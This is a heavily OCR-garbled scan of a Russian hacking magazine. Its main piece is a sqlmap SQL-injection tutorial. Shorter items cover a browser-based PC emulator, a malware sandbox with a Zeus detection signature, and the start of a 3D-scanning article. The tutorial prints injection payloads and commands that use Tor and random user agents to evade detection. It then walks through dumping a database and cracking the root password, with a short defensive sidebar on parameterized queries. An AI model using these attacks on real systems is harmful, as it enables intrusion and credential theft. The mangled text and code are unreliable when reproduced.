может символ за символом определить вывод внедренного 
ЗОБ-выражения. В качестве альтернативы пользователь может 
предоставить строку или регулярное выражение для определения 
«*гие»-страниц (отсюда и название атаки). Алгоритм бинарного 
поиска, реализованный в зрі тар для выполнения этой техники, 
способен извлечь каждый символ вывода максимум семью НИР- 
запросами. Втом случае, когда вывод состоитнетолько из обычных 
символов, сканер подстраивает алгоритм для работы с более 
широким диапазоном символов (напримердля ипісобе'а). 

• Тіте-Ьазегі ЫіпгіБОБіпіесІіоп. Полностью слепая инъекция. Точно 
также каки в предыдущем случае, сканер «играет» с уязвимым 
параметром. Нов этом случае добавляет подзапрос, который при- 
водит к паузе работы 0ВМ5 на определенное количество секунд 
(например, с помощью команд 5БЕЕРП или В ЕИСН МАРКО). Исполь- 
зуя эту особенность, сканер может посимвольно извлечь данные из 
БД, сравнивая время ответа на оригинальный запрос и на запрос с 



ЗОБ-ИНЪЕКЦИЯ: ЧТО ЭТО? 

ЗОБ-инъекция — этоатака, направленная на веб-приложение, в 
ходе которой конструируется ЗОБ-выражение из пользовательского 
ввода путем простой конкантенации (например, $циегу="5ЕІ_ЕСТ * 
РКОМ изепз ІлІНЕКЕ ісІ= м .$_КЕ0Б)Е5Т[ "ісі" ]) . В случаеуспеха атакующий 
может изменить логику выполнения 50 Б-за проса так, как это ему 
нужно. Чаще всего он выпол няет простой Ѵ \ пдегргіпБіпд СУБД, а также 
извлекаетта блицы с наиболее «интересными» именами (например 
«изегз»). После этого, в за виси мости от привилегий, с которым и за- 
пущен о уязви мое приложение, он может обратиться к защищенным 
частям бэк-энда веб- приложения (например, прочитать файлы на 
стороне хоста или выполнить произвольные команды). 



внедренным кодом. Здесь также используется алгоритм двоичного 
поиска. Крометого, применяется специальный методдля вери- 
фикации данных, чтобы уменьшить вероятность неправильного 
извлечения символа из-за нестабильного соединения. 

Несмотря на то что сканер умеет автоматически эксплуатировать 
найденныеуязвимости, нужно детально представлять себе каждую 
из используемых техник. Если тема 50 Б- инъекций тебе пока знакома 
толькона пальцах, рекомендуюполистатьархив][или прочитатьма- 
нуал Дмитрия Евтеева «ЗОБ Ігцесііоп: ОтА до Я» ( Ь і 1: . Іу/ р В 5 N ѴА ) . Важно 
также понимать, что для разных 0ВМ5 реализации атаки зачастую 
сильно отличаются. Все эти случаи умеет обрабатывать зрітар и на 
данный моментподдерживаетМуЗОБ, Огасіе, РозБдгеЗОБ, МісгозоЦ 
ЗОБЗегѵег, МісгозоЦ Ассезз, 50Бі1:е, РігеЬігсІ, ЗуЬазе и ЗАР МахОВ. 

ФИШКИ 5СІІ_МАР 

Движок для определения ЗОБ-уязвимостей — пускай и самая важная, 
но все-таки не единственная часть функционала зрітар. И прежде чем 
показать работу сканера в действии, не могу хотя бы вкратце, ноне 
рассказать о некоторых его фишках. Итак, в зрі тар реализовано: 

• Извлечение имен пользователей, хешей их паролей, а также при- 
вилегий и полей. 

• Автоматическое распознавание типа используемого хеша и воз- 
можность взлома его с помощью брутфорса по словарю. 

• Получение списка баз данных, таблиц и столбцов. 

• Возможностьсделать полный или частичный дамп базы данных. 

• Продвинутый механизм поиска баз, таблиц или даже столбцов (по 
всем базам сразу), что может быть полезно для определения та- 
блиц с «интересны ми» данным и вроде имен пользователей (изегз) 
или паролей (разз). 

• Загрузка или, наоборот, закачка произвольных файлов на сервер, 
если уязвимое веб- приложение использует Му50 Б, МуЗОБ, 
РозІгеЗОБили МісгозоЙЗОБЗегѵег. 

• Выполнение произвольных команд и получение шелл а, если на хосте 
используется одна из СУБД, перечисленных в предыдущем пункте. 

• Поддержка прямого подключения к базе данных (без явного ис- 
пользования ЗОБ-уязвимости) с использованием полученных в 
ходеатаки имени и пароля пользователя для доступа кОМВ5,а 
также ІР-адреса, порта и имени базы данных. 

• Установка надежногоТСР-соединения (так называемого ои^-оЪ 
ЬапсІ) между машиной пентестера и хостом, на котором запущен 
сервер баз данных. В качестве обертки для этого канала может 
стать интерактивная командная строка (шелл), сессия Ме*егрге1:ег 
или доступ к удален ному рабочему столу через ѴЫ С- подключение. 

• Повышение привилегий для процесса базы данных через команду 
деіізуз^ет МеІіазрІоіБа, которая, помимо прочих, реализуетизвест- 
нуютехнику кіБга рОсІ (М510-015). 

Как один из авторов этой утилиты могу сказать: это действительно 
хороший инструмент, созданный хакерами для хакеров. И он работает! 
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ПРИСТУПАЕМ К ПРАКТИКЕ 

Убедиться в этом тебе помогут несколько моих сценариев. Это на и бо- 
лее типичные ситуации, которые используют основные возможности 
зрітар. К слову, ты тоже можешь сразу проверить весь функционал 
сканера — например, на специально созданном тренировочном при- 
ложении отОѴѴАЗР ( ѵѵѵѵѵѵ.оѵѵазр.ог ], в котором намеренно воссозданы 
многие из опасных ош и бок программ истов. Тут на до сказать, что 
зрі тар написан на РуШоп'е, а значит, ты сможешь запустить его под 
любой ОС. Единственное требование — это установленный в системе 
интерпретатор пайтона. В качестве объекта для теста на проникно- 
вение я буду использовать виртуальную машину, на которой будет 
крутиться стандартный стек І_АМР (І_іпих/АрасЬе/Му5СІІ_/РНР) вместе 
с несколькими уязвимыми веб- приложения ми. 

СЦЕНАРИЙ №1 

Условимся, что мы хотим проэксплуатироватьуязвимость, которая была 
найдена в6ЕТ-параметре«ісІ»веб-страницы, расположенной поадресу 
Ьіір:/Д\МлМл/.зііе.сот/ѵи1п.рЬр?ісІ=і( для указания ІІРІ_ будет ключ -и). 
Чтобы снизитьподозрительнуюактивность, мы будем маскироваться под 
обычный браузер (ключ — гапсІоіті-адепі),адля подключения использо- 
ватьзащищенный канал ТОР-сети (— Іог]. Итак,запускаемзрІтар: 



ТИПИЧНАЯ ОШИБКА 



Той ошибкой программистов, из-за которой становится возможной 
ЗОБ-атака, чаще всего является прямая конкантенация нефильтруе- 
мых или неприводимых к нужному типу значений параметров в стро- 
ках, которые содержат 50 1_- вы ражен ия. Например, в РНР наиболее 
частым примером небрежности является использование кода вроде 
$циегу="БЕІ_ЕСТ пате, сіезсгірііоп, соттепі РВОМ саіаіо^з ИНЕКЕ 
саіісІ= ,, .$_СіЕТ["саіісГ]. Какты видишь, 6ЕТ параметр "саііісі " напря- 
мую извлекается из запроса и запросто может содержать зловредный 
50 1_ запрос. Таким образом, взломщник может просто привести 1)ПІ_ 
к виду вроде «Ьіір://і\/і\/м.5Ііе.сот/ѵи1п.рЬр?ра8е=-Ргопі&саіісІ=-1 
ЬІМІОІМ АН 5ЕІ.ЕСТ сІаіаЬа5е(),сиггепі_и5ег(),ѵег5Іоп()&иісІ=0», для 
того чтобы получить информацию о базе данных, которая отобразится 
прямо в содержимом страницы. 

ІІМРОВМАТІОІМ_БСНЕМА.СНАВАСТЕВ_5ЕТ5 6К0УР ВУ х)а) 



$ рѵІіМоп здітар.рѵ -и "Міііір: //ыы\л/. 5І1:е.сот/ѵи1п . рМр?ісІ=1" 
--гапсІот-а§епі --іог 

зцІтар/І.Ѳ-сІеѵ (п4365) - аиіотаііс БС^І. іпіесііоп 
апсі сІаіаЬазе іакеоѵег іооі 

Сканер определит несколько точек для выполнения инъекций в 
17 НТТР(5) -запросах. Обрати внимание, что для каждой из них указы- 
вается тип, а также пэйлоад. 



Ріасе: СЕТ 
Рагатеіег: ісі 
Туре: Ьооіеап-Ьазесі ЬііпсІ 

Тіііе: АІМЭ Ьооіеап-Ьазесі ЬііпсІ - ІлІНЕКЕ оп НАѴІІМС сіаизе 
РаѵіоасІ: ісІ=1 АМР 1826=1826 



Туре: еггог-ЬазесІ 

Тіііе: МѵБОІ- >= 5.0 АМР еггог-ЬазесІ - ІлІНЕКЕ о г НАѴІІМ6 сіаизе 
РаѵіоасІ: ісІ=1 АІМР (БЕ1.ЕСТ 8532 РК0М(5ЕІ.ЕСТ С0УІМТ(*),С0ІМСАТ( 
СНАВ( 58, 98,116,120, 58), (БЕ І_ЕСТ (СА5Е ІлІНЕІМ (8532=8532) ТНЕІЧ 1 
ЕІ_5Е 0 ЕІМР)),СНАК(58,98,121ДѲ2 < 58) 1 РІ-00К(КАІМР(Ѳ)*2))х РВОМ 



тіш № < 4* 

в - ; О 



те рсдс- стпсі вс шзр ійус^ 

ТГШ» Ь л дяЫяІт п -іІЛ ищ цяр рти яш Егрш ? Еп гшжЬ ,фЛЯ Щ смпи* 



ГсЛовіпд 

і Ор*п Г*-НГ а ік 1*3- Іиат* Р-ЧІГ, № п4 № ѴР. Ім* Ааг Іт** Ь 
№+іпй| 



Ткмч* МенЧ№№1І№М 

[Мкганй][НЖ ЯХ йчг ОпгвгЦЭД. 

Шла мгнл ытмголр н пмесхиг тми* 5 ф іікчм 

(кН 14 ЛИ 

{Ср 1 ІП- 1 Ш ЖШИ СіУрйШКУі ЕцУпЧ ЕйЛШІ 
іп Шііі 4 шгъ ЧТ ІД (ЬиЬЙ ЭДВВ Іиѵиі Ѵмк 3 ) .' ЪжСлІл Іѵѵ* 






Туре: У1МІ01М диегу 

Тіііе: МуБ(2І_ УІМІОІМ циепу (І\ІІЛ_І_) - 3 соіитпз 

Рауіоасі: ісІ=1 УМІОІМ АН 5ЕІ_ЕСТ ІМУІ_І_, МУН, С0МСАТ(СНАК(58,98,116 
,120,58), ІРМУІІ(СА5Т(СНАК(74,76,73,112,111,113,103,118,80,84) АБ СН 
АК),СНАК(32)),СНАК(58,98,121,102,58)) 



Туре: АМР/ОК Іііте-ЬазесІ ЬііпсІ 

Тіііе: МуБ(2І_ > 5.0.11 АИР ііте-ЬазесІ ЫіпсІ 

Рауіоасі: ісІ=1 АИР 5ПЕР(10) 

Помимо этого, сканер вы полнит распознавание базы данных, а так- 
же других технологий, использованных веб-приложением: 

[02:01:45] [ІІМРО] іЬе Ьаск-епсІ РВМБ із МуБОБ 

ыеЬ арріісаііоп іесЬпоІо^у: РНР 5.2.6, АрасЬе 2.2.9 

Ьаск-епсІ РВМБ: Му5(2І_ 5.0 

В конце концов полученные данные будут за писаны в определен- 
ный файл: 

[02:01:45] [ІІМРО] РеісЬесІ сіаіа 1о§§есІ іо іехі біез ипсіеп '/орі/ 
здітар/оиіриі/ммм. зііе. сот ' 

СЦЕНАРИЙ №2 

Теперь следующий пример. Предположим, что мы хотим устроить 
более детальный Ѵ\ пдегргіпУпд И] и получить текстовый баннер 
(--Ьаппег) системы управления базой данных, включая ее офици- 
альное название, номер версии, а также текущего пользователя 
(--сиггепі-изег). Кроме того, нас будут интересовать сохраненные па- 
роли (--раззѵѵогсіз] вместе с именами таблиц (— ІаЫез], ноневключая 
системные, (--ехсІисІе-зузсІЬз] — для всех содержащихся в СУБД баз 
данных. Нетпроблем, запускаем сканер: 

$ руіЬоп зцітар.ру -и "ЬіірѴ/ммм.зііе.сот/ѵиІп.рЬрРіс^І" 
--гапсіот-а^епі --іог -Т --Ьаппег --сиппепі-изеп --раззыопсіз 
--іаЬІез --ехсІисІе-зузсІЬз 

Очень скоро мы получим все данные об используемых технологиях, 
которые запрашивали: 

[02:08:27] [ІІМРО] ТеісЬіп§ Ьаппег 

[02:08:27] [ІІМРО] асііѵеіу 6п§егргіпііп§ МуБ(2І_ 

[02:08:27] [ІІМРО] ехесиііп^ МуБОБ соттепі іпіесііоп бп^егргіпі 



Еггог-ЬазесІ БОБ іпіесііоп 



ыеЬ а р ріісаііоп іесЬпоІо^ѵ: РНР 5.2.6. АрасЬе 2.2.9 
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Бдітар, или 5СП_- инъекции — это просто 



Ьаск-епсІ 0ВМ5: асЕіѵе бп^егргіпі:: Му5(2І_ >= 5.1.12 апсі < 5.5.0 
соттегтЕ іпіесЕіоп бп%егргіп-Е: МѵБОІ. 5.1.41 
Ьаппег рагзіп% іпп^епрпіпі: : МѵБОІ. 5.1.41 



Ьаппег: '5.1.41-3~Ьро50+Г 

После — имя текущего пользователя: 

[02:08:28] [ІІЧРО] -Ре1:сНіп% сиггегтЕ изег 
сиггеп~Е изег: 'гоо-ЕфІосаІЬоз-Е' 

Далее получаем хеши всех пользовательских паролей и выполня- 
ем брутфорс-атаку по словарю: 

[02:08:28] [ІМРО] -Реіісіііп^ ба-ЕаЬазе изегз раззмогб ЬазЬез 
сіо уои магтЕ іо рег-Рогт а сИсЕі оп апу-ЬазесІ аііаск а § аіп з- Е геіш іе ѵесі 
раззмогб ЬазЬез? [У/п/д] У 

[02:08:30] [ІІМРО] изіп§ ЬазЬ те-ЕЬоб 'тузд1_ра55мб' 
мЬаІ: бісЕіопагу сіо уои маггЕ 1:о изе? 

[02:08:32] [ІІМГО] изіп§ бе-РаиІЕ бісЕіопагу 
[02:08:32] [ІМРО] іоасііп^ сіісЕіопагѵ -Ргот 
Ѵор'Е/здІтар/'Ех'Е/могсІІіз'Е.'ЕхІ: 1 
сіо уои ыагтЕ Ііо изе соттоп раззыогб зи-Рбхез? (зіом!) [ѵ/ІМ] N 
[02:08:33] [ІМРО] з-ЕагЕіп^ бісЕіопагу-Ьазеб сгаскіп§ (тузд1_раз5мб) 
[02:08:35] [ІМРО] спаскесі раззмогб '■Еез’Еразз' -Рог изег 'гооі:' 
сІа-ЕаЬазе тапа§етеггЕ зуз-Еет изегз раззмогб ЬазЬез: 

[ *] сІеЬіа п-зѵз-таігтЕ [1]: 

раззмогб ЬазЬ: *6В2С58ЕАВР91С1776РА223ВѲ88В6Ѳ16Ѳ4Р898847 
[*] пооі: [1]: 

раззмогб ЬазЬ: *00Е247АС5Р9АР26АЕ0194В41Е1Е769ОЕЕ1429А29 
сіеэг-іехі: раззмогб: -Еез-Еразз 

Опа! Для гооСа мы быстро подобрали пароль (для примера он был 
очень простой]. Пришло время сдам пить интересующие нас данные: 

[02:08:35] [ІМРО] -Реіісіііп^ сІа-ЕаЬазе патез 
[02:08:35] [ІМРО] -РеІісЬіп^ -ЕаЫез -Рог сІа-ЕаЬазез: 
іп-Рогта1:іоп_5сЬепіа, тузді, омазрІѲ, -Еез-ЕсІЬ 
[02:08:35] [ІМРО] зкірріп§ зуз-Еет сІа-ЕаЬазез: 
іп-Рогта-Еіоп зсЬета. тузді 



Оа-ЕаЬазе: омазрІѲ 
[3 -ЕаЫез] 



КАКЗАЩИТИТЬСЯ? 



Наиболее надежным способом предотвращения 50І_-инъекций 
является использование параметризированных50І_-параметров. К 
примеру, в случае с РНР это возможно с помощью пакета РЕАР'з йВ 
( реаг.рЬр.пеі/раскаде/РВ ), предлагающего интерфейс для выполнения 
абсолютно безопасных 501-выражений. Обращение к БД происходит 
следующим образом: $р = $бЬ->ргераге("5ЕІ_ЕСТ * РВОМ изегз ІлІНЕКЕ 
ісі = ?"); $бЬ->ехеси-Ее($р, аггау($_СЕТ['іб'])). Основная идея за- 
ключается в том, что если позиция параметров явно задана, то можно 
абсолютно безопасно передавать 50І_-зап росы базе данных, исключая 
возможность для параметровсамим стать50І_-выражениями (втом 
числе зловредными). Стоитза метить, что другие механизмы, такие как 
использование принудительного приведения типов (например, с по- 
мощью функции іпЕѵаіО) в связке с экранированием строк таким и функ- 
циями, кактуздІ_геаІ_езсаре_5Ігіпд() или асІсІБІазНезО, неявляются 
абсолютно безопасными. Проблема втом, что существуют некоторые 
варианты для их обхода, а следовательно, к их использованию необхо- 
димо подходить с максимальным вниманием. 



+ + 

| ассоштЕз | 

| Ыо§5_~ЕаЫе | 

I Мі-ЕІое |_ 

+ + 



Ра-ЕаЬазе: -Еез-ЕсІЬ 

[1 іаЬІе] 

+ + 

| изег5 

+ + 



[02:08:35] [INРО] РеісЬеб баіа 1о§§еб -Ео іех-Е біез ипсіег ’/ор-Е/ 
здІшар/ои-Ери-Е/ыыы .зі-Ее.сот' 

Готово! 

СЦЕНАРИЙ №3 

Теперь, обнаружив в базе да иных ЕезЕбЬ-та блицу (-Б ЕезЕбЬ) с интерес- 
ным именем «изегэ» (-Т изегз], мы, естественно, заходим заполучить 
ее содержимое себе (~битр]. Но чтобы показать еще одну интересную 
опцию, не будем копировать все данные просто в файле, а реплициру- 
ем содержимое таблиц в основанную на файлах базу да нныхЗОЫЕе на 
локальной машине (--герІісаЕе). 

$ руЕЬоп здішар.ру -и ,, Ь■Е■Ерт//мыы.зі-Ее.сот/ѵи1п.рI^р?іб=1 ,, 
--гапбот-а%еп-Е ---Еог --битр -Р -Еез-ЕсІЬ -Т изегз --герІіса-Ее 

Сканеру не составит труда определить названия столбцов для 
таблицы изегз и вытащить из нее все записи: 

[02:11:26] [ІІМРО] -Ре-ЕсЬіп§ соіишпз То г ТаЫе 'изегз' оп баТаЬазе 
Чез-ЕбЬ' 

[02:11:26] [ІЫРО] -Ре-ЕсЬіп% егтЕгіез Тог ТаЫе 'изегз' оп баТаЬазе 
Чез-ЕбЬ' 

РаТабазе: -ЕезТбЬ 
ТаЫе: изегз 



[4 еітЕгіезХ 
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| іб 


.+ + + 

| пате | зигпате | 
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.+ + + 
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| Пи-р-ру | Ьиппу 


1 з 


| ми | тіп§ 


1 1 


| ІиіЬег | ЬІіззе-ЕІ: | 


| 4 


| ІМШ_І_ | патеізпи11| 


+ 


.+ + + 



[02:11:27] [ІМРО] ТаЫе Чез-ЕбЬ. изегз' битреб То здІгЕеЗ Ые 



Таким образом мы получим да мп базы данных в файле ЕезЕбЬ. 
здІіЕеЗ в формате 50 Піе. Фишка втом, что в при таком раскладе мы не 
только можем посмотреть данные, но еще и выполнить кнейлюбые 
запросы, за юза в возможности 50І_іЕе (например, с помощью про- 
граммы 50І_іЕе Мападег]. 



РЕЗЮМЕ 

В прошлом номере в рубрике РгооЕ-оЕ-сопсерЕ я рассказывал тебе 
о 0555, небольшом РуЕЬоп-скрипте, который умеет обнаруживать 
501-уязвимости. Идея заключалась в том, чтобы создать эффектив- 
ный сканер, который будетхорошо работать, ноуложиться при этом 
в 100 строчек кода. Это лишний раз доказывает, что обнаружение 
50І_-уязвимостей — это лишь малая часть дела. Их эксплуатация 
— вопрос куда более сложный. Но его готов взять на разрешение 
здітар, в котором мы объединили многолетний опыт огромного 
количества пентестеров, чтобы сканер мог эффективно не только 
находить 501-инъекции, но и извлекать из этого максимальную 
выгоду. НЕ 
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"? РгооРоРСопсерІ: 

к ЗАПУСТИТЬ ИЫІІХ 
і В БРАУЗЕРЕ 



То, что мы увидели одним июльским вечером в редакции, впе- 
чатлило нас до глубины души. Зайдя на сайт ЬеІІапіога/]5Ііпих. 
мы увидели, как прямо внутри браузера стартует Ыпих-система, 
с которой можно работать так, как если бы она была запуще- 
на под виртуальной машиной. Сперва нам показалось, что это 
просто эмулятор линуксовой консоли и некоторых никсовых 
команд. Но очень скоро стало ясно, что это полноценный эмуля- 
тор РС, который полностью написан на ЗаѵаБсгірІ и выполняется 
прямо в браузере! Можно даже написать на Си приложение и от- 
компилировать его с помощью включенного по умолчанию ком- 
пилятора ТіпуСС. Это просто чума! Какому крутышу удалось это 
реализовать? Вопросы отпадают сами собой, когда посмотришь 
на копирайты. ЭаѵаБсгірІ: РС Етиіаіог (а именно так называется 
проект) написал Фабрицио Беллард — создатель эмулятора 
ОЕМСІ. Мы решилиузнатьунего, как ему в голову могла прийти 
такая безбашенная идея. РоС получился вне всяких похвал. 






ТГР 1 

х Г ідьадс А» 1Д1|"Ь ^хх* ІяиМііі: ІіХіЬл 1 х к. и ІЩ 

Л 1 Еі 1 ІГІ 

ГсегАйчі 1ИАІІ4І шевоіуі 2СИ6к Ееміі 
ІССЙІ МййЕУ ІІІййкСіа. О 

іа эск*-Нч]*г п'кзр 

ха эиі.п і и ] сі и и Ц ха х |_ы : е у х-а-^іи!*! пьі 

іа дсЪсЛіДг-г ^е-э>іЗ іггс 

ха л=Ьс>сіи1сх х сі|і э ЦсхсіІ I. и.и:1 1_ ^ 

ші тш сіиіЕ йсі^йе 

МУ 7 : хаЪсх гіі е: : и г _ :::: :: .1 I л_=х 1 у I 

ШТі АбфИКХЫ рГіТМйЗ ГШІу 17 
ІГз і Гіл ІРІ ІЬагссіп: аа-ІР 

Тігаг; ріи й к-ОДк лйи і. се Эіа? Ьмй і ав &л ] ] г 

ДАЮСЕГ: **т.2 Сііеэуясеа іЪшьі л". Ыаак & 

ЗЙІіНІІ : Р. : І4ііъ:31і: | 7>' ■Пі Г 1 И | ! :1 1 ч I [ I Іі Г.і і і и ГІ !і ч Ь . . . Нігіпр . 

о:т2 Гэ тгйш^: шчіъйі звдіші: саыіл гс-агЪс^,. гшшіяд схіэсЪ: іа гіоижми^ссі 
ѴРЯ: ИіѵііЛ-ЬГіІ а-ГяОІ -Іі-иМ 1 |Г Ь ЕіСВ|ГаТ-Г*3 - 
Рс«Аіы| ±иилм к.егье-1 звьлу: 12-1 к Гс«іі 

Лолі-.г :і 1 ті я 

Н±.1се*е ко іІ5/.Ыішж 

І агаат- - а 

ыіл'л |ше) 2.6,20 1 2 Кш Лид 3 2ЭзІІі02 СЕЛХ 5С11 іЗёс ита/Шиив 



С "ь 1 1 к^ііл БнгІілІ Ч-т і ^ Ѵи У- !г.' ІІЧП 



іаѵаБсгірІ РС Етиіаіог быстрее всего работаете Ріге^ох 



ЗАЧЕМ В00БЩЕТЫ ВСЁ 
ЭТО ЗАТЕЯЛ? РАДИ ЧЕГО? 

Я хотел сделатьсвоего рода ІІпіх-подобную 
систему в браузере. Я знаю о существовании 
проекта І5/ІІІХ [ \л/ѵѵѵѵ.та55ѵѵегк.а1:/І5иіх ], но меня 
грела идея о возможности запускать в браузере 
реальные би на рн и ки II піх- команд. Изначально 
я лишь хотел реализовать эмулятор пользова- 
тельского окружения и полностью написатьна 
^ѵаБсгірІ: ядро системы. Однако позже я осо- 
знал, что с помощью современных ^-д в ижков 
проще эмулировать целый компьютер и уже на 
немзапускатьполноценный Ыпих. 

ЧТО В ЭТОМ ОСОБЕННОГО? 

Есть немало эмуляторов компьютера, и я в том 
числе стою у истоков одного из них (ОЕМІІ). 
^ѵаБсгір* РС Етиіаіог интересен тем, что рабо- 
таете большинстве браузеров и вообще не тре- 
бует установки. Конечно, он заметно медленнее, 
но все равно может использоваться, к примеру, в 
образовательных целях. Поскольку код написан 
на чистом іаѵаБсгірСе, он можетпослужить не- 
плохим бенчмарком для замера производитель- 
ности ^-движков. Могу сказать, что сейчас про- 
ект быстрее стартует на іаедег Мопкеу, который 
используется в Ріге^ох4, чем в Ѵ8 (СИ готе). Я пока 
не могу объяснить, в чем причина, поскольку 
успел пока изучить код только іаедегМопкеу 
(Фабрицио — настоящий гик-монстр. — Прим, 
редакции). 

КАКИЕ С ЭТИМ БЫЛИ СЛОЖНОСТИ? 

Самая навороченная часть проекта — это, 
конечно, эмулятор процессора х86. Проект эму- 
лируетеще рядустройств (последовательный 
порт, контроллер прерываний, эмулятортер- 
минала), но с процом возни было больше всего. 
Тут надо понимать: б ы лоб ы проще эмулиро- 
вать С РІІ с ПІБС-архитектурой (какой-нибудь 
МІР5илиАНМ),но куда круче было бы иметь 
возможность запускать вездесущий х86 код. 
Ведь в конечном счете это позволит за пускать и 
другие ОС, не только Ыпих. Еще одна сложность 
состояла в том, чтобы добиться приличной 
производительности эмулятора в браузере 
(сейчас проект работает в Ріге^ох и СИ готе). 

Я обнаружил, что некоторые конструкции 
выполняются медленнее, чем другие в тех же 
самых браузерах. Поэтому пришлось изрядно 
адаптировать код. ИИ 
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Степан Ильин (іѵѵіНег.сопп/зІераЫ 




КОЛОНКА РЕДАКТОРА 

Про анализ 
малвари 



авнохотел найти простой и интеллектуальный инструмент 

Д для анализа малвари. И кажется, нашел. В одном из давниш- 
них номеров я уже рассказывал про онлайн-сервисы, которые 
предлагаютзапустить подозрительный би на рни к в песочнице и 
проанализировать его действия в системе. Детальность таких отчетов 
поражает: можно посмотреть, какие ключи были созданы в реестре, 
к каким файлам происходили обращения, какие перехваты функций 
выполнялись и так да л ее. Некоторые из таких сервисов автоматиче- 
ски дел а ют скриншот приложения и предлагают полный дамп сетевой 
активности исследуемого приложения в РСАР-формате. Всему этому 
хозяйству не хватаеттолько одного — некого интеллектуального 
механизма, который мог бы не только выкладывать сухие факты, но 
еще и интерпретировать их. То, чего я та к давно хотел, я обнаружил 
случайно в сервисе швейцарского исследователя Стефана Бюльмана. 
Его разработка — Зое БапсІЬохѴѴеЬ [ уууууу.щезесигНу.огд ] — также, 
каки многие другие сервисы -песочницы, возвращает детальнейший 
отчет о поведении файла в системе, нос важным отличием. За счет 
интеллектуального механизма сканер понятным языком говорит о той 
активности бинарника, которая вызываетподозрения. «Инжектирует 
РЕ-файл в чужой процесс», «Перехватывает вызов ѵѵіпзоске^-функций 
для перехвата трафика», «Открывает порт и ждет входящих подклю- 
чений», «Уста на вливает хуки для функций, выводящие спи сок файлов 
и директорий» — в отчет попадают конкретные и ясные формули- 
ровки, понятные человеку, который по роду деятельности обычно не 
занимается анализом малвари. Все события ранжируются по степени 
опасности. Я перечислил некоторые из особо подозрительных. Но есть 
и другие маркеры, на которые при анализе стоит обратить внимание, 
но которые не обязательно свидетельствуют о зловредном характере 
приложения. Например: «Отправляет данные на веб-сервер», «Точка 




Разные цвета— разные степени опасности событий 



входа в приложения лежит вне стандартных секций», «Запрашивает 
сп и сок за пущенных процессов», «Содержит дол гие зіеер'ы (больше 
2 минут]», «Создает файлы драйверов» и так да л ее. Всего в базе Зое 
БапсІЬохѴѴеЬ сейчас 160 сигнатур для анализа поведения бинарника. 
Любую из них можно подстроить под свои нужды. Ничего не стоит 
написать и свои собственные сигнатуры, воспользовавшись простым 
Ру1:Иоп -интерфейсом для обработки данных о поведении программы. 
При веду для примера часть сигнатуры для анализа 2еиз'а, с помощью 
которого мы обучаем сканер реагировать на типичные для этого троя 
создаваемые файлы: 

геизбіез = ["с:\\міпс!ом5\\5у5І:ет32\\п1:о5.ехе" . \ 

[ . . . пропущено . . . ] 

"с : \\ыіпсIом5\\5у51:ет32\Л1ом5ес\\и5еп.сІ5 ,, ] 



сіе-р 5І§та1;сІі(сІа1;а) : 

і-р сІа1:а [ "-Рипс " ] == "бІеСгеаіесГ : 

ІР гіа~Ьа["5~Ьа‘Ьи5"] ,ДпсІ("5иссе55") != -1: 

# Проверяем, попадают ли созданные файлы в блек-лист 

Рог геизбіе іп іеизбіез: 

іР сІа1:а [ " ра1;М " ] Ломег() == геизбіе: 
іеизсІеРесРесІ = Тгие 



еІіР сІаРа["Рипс"] == "І г ЕРр" : 

ІР геизсіеРесРес! : 

# Извлекаем ІР-адрес С&С-сервера 

ІР ге.та1:сЬ( п"РО$Т.*^ а1 :е\.рІір" . сІа1:а[ "пециезР"] , ге.І): 
іеиззепѵепз . аррепсі (сіаіа [ "сізііір" ] ) 

Вообще подобная расширяемость дает Зое БапсІЬохѴѴеЬ сто очков 
вперед перед другими конкурентами. Еще одной киллер- фичей 
является возможность использования Аиіоіі-с крипто в, чтобы опре- 
делить действия, которые должны происходить во время анализа 
малвари. То есть можно четко автоматизировать любое взаимодей- 
ствие с системой и приложениями (браузинг определенных страниц, 
заполнение форм, установку приложения итак далее]. Тут надо 
понимать: многие из действий малварь выполняет только в случае 
возникновения определенных событий. К примеру, банковский трой 
может собирать данные форм только при посещении пользователем 
определенных сайтов. Сервис позволяет обработать подобную си- 
туацию. С помощью простого скрипта мы можем получить не просто 
отчет о том, что происходит в системе после запуска исследуемого 
приложения, но и полный анализ того, что происходит при возникно- 
вении обозначенных событий. Сценарии позволяют еще и управлять 
анализирующим движком: к примеру, создавать при необходимости 
скриншот экрана или включать в нужном месте снифердля перехва- 
та трафика. И это лишь малая часть возможностей Зое БапсІЬохѴѴеЬ. 
Правда, в бесплатной версии сервиса они доступны не все. А для 
получения даже бесплатного аккаунта придется написать письмо его 
создателю. Ксчастью, отвечаетон быстро. ПС 
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Эдуард Гузь 




КАК СОЗДАТЬ 
ЗО-МОДЕЛЬ 
ЛЮБОГО ПРЕДМЕТА 
ПОДРУЧНЫМИ 
СРЕДСТВАМИ 



Профессиональный Зй-сканер, 
с помощью которого можно 
оцифровать реальный объект, 
получив его компьютерную 
модель, стоит десятки тысяч 
долларов. Мы же сможем про- 
вернутьтоже самое с помощью 
специальной программы, лазер- 
нойуказки и веб-камеры. Всего 
долларов за тридцать. 



1УАУАУІ 

Насайте разработ- 
чика уууууу^гіауиі^ 

Іавегзсаппег. 

сощесть прекрасное 
руководство на рус- 
ском языке. Прочти 
егообязательно! 
Тамоченьподробно 
описаны итребова- 
ниякоборудованию, 
ипоследователь- 
ностьсканирования, 
и разные нюансы, 
которые могутутебя 
возникнуть. 



030-СКАНИРОВАНИИ 

Многие сферы нашей жизни немыслимы без трехмерной графики. 
Огромная армия Зй-моделлеров (или п оп росту Зй'ш ни ков) ежедневно 
создает модели, которые потом успешно используются в самых разных 
областях, начиная от кинематографа, рекламы, промышленного про- 
изводства, архитектуры и заканчивая бог знает чем еще. Любой чело- 
век, занимающийся моделированием, рано или поздно сталкивается 
со следующей задачей: нужно создать модельтого, что уже существует 
в нашем трехмерном мире. Это может быть что угодно. Например, 
модель-прототип, которую натвой стол положил заказчики попросил 
сделать «точнотакже, только в компьютере». Причем смоделировать 
нужно не просто чтобы «было похоже», а чтобы объект-прототип и 
трехмерная модельбыли какблизнецы-братья, разделенныеэкраном 
компьютера. Так случилось и со мной. Выполняя очередной заказ по 
моделированию, я столкнулся с очень жестки ми требованиями по со- 
ответствию моей модели образцу клиента. После энного безуспешного 
согласования стало ясно, что в этот раз нужна абсолютная точность 
модели. Во всяком случае клиент был уверен, что в противном случае 
если и не наступит Армагеддон для всего человечества, то по крайней 
мере случится что-то похожее. Что мне оста вал ось делать? Попро- 
бовать, на конец, 30 -сканирование! Я тогда еще подумал: «Это же 
моделирование для ленивых». Минута дела — и всё, модель готова! К 
моему вел и кому уди в лен ию (и разочарованию), оказалось, что даже 
самый простенький 30-сканер стоит больших денег. Вернее говоря, 
очень больших. Чтобы его купить, я должен был умножить стоимость 
этой модели на число с пятью нулями. Но раз нельзя купить, значит, 
